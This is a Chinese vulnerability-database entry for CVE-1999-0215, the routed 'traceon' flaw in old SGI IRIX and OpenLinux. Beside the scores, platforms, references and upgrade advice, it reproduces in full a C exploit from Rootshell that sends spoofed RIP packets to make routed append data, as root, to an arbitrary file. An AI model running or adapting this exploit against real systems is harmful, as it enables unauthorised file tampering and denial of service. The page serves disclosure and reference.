CVE-1999-0215
CVSS6.4
发布时间 :1998-10-26 00:00:00
修订时间 :2008-09-09 08:34:01
NMCOE    

[原文]Routed allows attackers to append data to files.


[CNNVD]Routed数据注入漏洞(CNNVD-199810-014)

        Routed存在漏洞。攻击者可以对文件添加数据。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.0.1SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:3
cpe:/o:sgi:irix:6.4SGI IRIX 6.4
cpe:/o:sgi:irix:5
cpe:/o:sgi:irix:4
cpe:/o:sgi:irix:6.1SGI IRIX 6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0215
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0215
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199810-014
(官方数据源) CNNVD

- 其它链接及资源

http://www.ciac.org/ciac/bulletins/j-012.shtml
(UNKNOWN)  CIAC  J-012
ftp://patches.sgi.com/support/free/security/advisories/19981004-01-PX
(UNKNOWN)  SGI  19981004-01-PX

- 漏洞信息

Routed数据注入漏洞
中危 未知
1998-10-26 00:00:00 2005-05-02 00:00:00
远程  
        Routed存在漏洞。攻击者可以对文件添加数据。

- 公告与补丁

        

- 漏洞信息 (20805)

SGI IRIX 3/4/5/6,OpenLinux 1.0/1.1 routed traceon Vulnerability (EDBID:20805)
irix remote
1998-10-21 Verified
0 Rootshell
N/A [点击下载]
source: http://www.securityfocus.com/bid/2658/info

routed is a daemon used to dynamically update network routing tables. Certain operating systems (including IRIX 3.x up to 6.4 inclusive, Caldera OpenLinux 1.0 and 1.1) contain a routed version which allows attackers to write limited data to arbitrary files, with root privileges. routed communicates using the Routing Information Protocol (RIP - RFC1058, RFC1723). An obsolete command specified by this protocol is "traceon," which turns on certain debugging features and logs information to a file specified in the RIP packet.

Attackers can construct packets (typically with spoofed source addresses) to turn on this feature and cause routed to append debugging information to the specified trace file. Although the information thus written is limited to the normal routed debugging output, the files specified could include /dev files and therefore this could lead to a number of damaging scenarios including memory and disk corruption, denial of service, etc. 

/*
 * BSD 4.4 based routed trace file exploit
 *
 * (C) 1997 Rootshell [ http://www.rootshell.com/ ]
 *
 * <info@rootshell.com>
 *
 * routed has the ability for a packet to be sent to the daemon that will
 * turn on debug mode.  The packet is able to specify the file which is
 * later opened without any checks being placed on that file open.
 *
 * Result: You can append to any file on the filesystem.
 *
 * The following syscall is made AS ROOT.
 *
 * ftrace = fopen(file, "a");
 *
 * This is obviously a LARGE problem.
 *
 * Solaris 2.6 seems to ignore these packets and returns the following
 * error.  Mileage may vary.. :
 *
 * in.routed[6580]: trace command from 1.2.3.4 - ignored
 *
 * Redhat routed was tested and found to check if the packet came from
 * a valid router.  If you spoof the RIP packet from their default
 * gateway the packet is ACCEPTED.
 *
 * Note: Once a trace file is opened you must close the trace file and then
 * open another file.
 *
 * Exploit tested under Linux 2.0.x.
 *
 * ps.  Just run gated! (http://www.gated.org/)
 *
 */


/* File to append to on filesystem with debug output */

#define FILETOCREATE	"/tmp/rootshell"


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <linux/udp.h>
#include <netinet/protocols.h>
#include <netdb.h>
#include <protocols/routed.h>
#include <linux/route.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);
}

/* Send faked UDP packet. */
int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long  int saddr, daddr;
char *data;
{  
  struct iphdr  ip;
  struct udphdr udp;
  static char packet[8192];

  /* Fill in IP header values. */
  ip.ihl      = 5;
  ip.version  = 4;
  ip.tos      = 0;
  ip.tot_len  = htons(28 + datalen);
  ip.id       = htons(31337 + (rand()%100));
  ip.frag_off = 0;
  ip.ttl      = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check    = 0;
  ip.saddr    = saddr;
  ip.daddr    = daddr;
  ip.check    = in_cksum((char *)&ip, sizeof(ip));

  /* Fill in UDP header values. Checksums are unnecassary. */
  udp.source = htons(sport);
  udp.dest   = htons(dport);
  udp.len    = htons(8 + datalen);
  udp.check  = (short) 0;

  /* Copy the headers into our character array. */
  memcpy(packet, (char *)&ip, sizeof(ip));
  memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
  memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

  return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0,
         (struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}

/* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */
unsigned int lookup(host)
char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr(host);	/* Try if it's a "127.0.0.1" style string */
  if (addr == -1) 		/* If not, lookup the host */
  {
    he = gethostbyname(host);
    if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
      return 0;

    bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
  }
  return(addr);
}

void
main(argc, argv)
int argc; char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s;
  struct rip rp;

  if(argc != 4)
    errs("\nSee http://www.rootshell.com/\n\nUsage: %s <source_router> <dest_addr> <command>\n\ncommand: 3 = trace on, 4 =
trace off\n\n",argv[0]);

  if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err("Unable to open raw socket.\n");

  if(!(saddr = lookup(argv[1])))
    err("Unable to lookup source address.\n");
  if(!(daddr = lookup(argv[2])))
    err("Unable to lookup destination address.\n");

  sin.sin_family     = AF_INET;
  sin.sin_addr.s_addr= daddr;
  sin.sin_port       = 520;

  /* Fill in RIP packet info */
  rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */
  rp.rip_vers = RIPVERSION; /* Must be version 1 */
  sprintf(rp.rip_tracefile, FILETOCREATE);

  if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1)
  {
    perror("sendpkt_udp");
    err("Error sending the UDP packet.\n");
  }
}

		

- 漏洞信息

1806
NetKit routed Debug Mode Arbitrary File Manipulation
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

1997-09-01 Unknow
Unknow 1999-12-14

- 解决方案

Upgrade to version 0.16 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Note: This was actually fixed between 0.11 (1997-06-12) and 0.16 (1999-12-14), but the changelog is not complete and does not have an exact version or date for the release.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站